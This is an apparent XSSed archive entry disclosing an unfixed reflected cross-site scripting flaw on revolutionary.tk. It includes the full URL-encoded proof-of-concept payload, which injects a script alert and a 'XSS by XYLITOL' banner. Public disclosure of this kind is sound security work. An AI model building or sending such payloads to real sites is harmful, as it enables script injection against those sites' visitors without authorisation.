Unfixed XSS vulnerability at revolutionary.tk

2008-06-18T00:00:00
ID XSSED:42508
Type xssed
Reporter xylitol
Modified 2009-10-06T00:00:00

Description

Security researcher xylitol, has submitted on 18/06/2008 a cross-site-scripting (XSS) vulnerability affecting revolutionary.tk, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://revolutionary.tk/a?t=http://www.googleearth4mac.tk/a?t=%27%22%3E%3C%2F%74%69%74%6C%65%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%33%33%37%29%3C%2F%73%63%72%69%70%74%3E%3E%3C%6D%61%72%71%75%65%65%3E%3C%68%31%3E%58%53%53%20%62%79%20%58%59%4C%49%54%4F%4C%3C%2F%68%31%3E%3C%2F%6D%61%72%71%75%65%65%3E&c=1&p=1&r=1186880594051+Nsync&c=1&p=1&r=1196836952457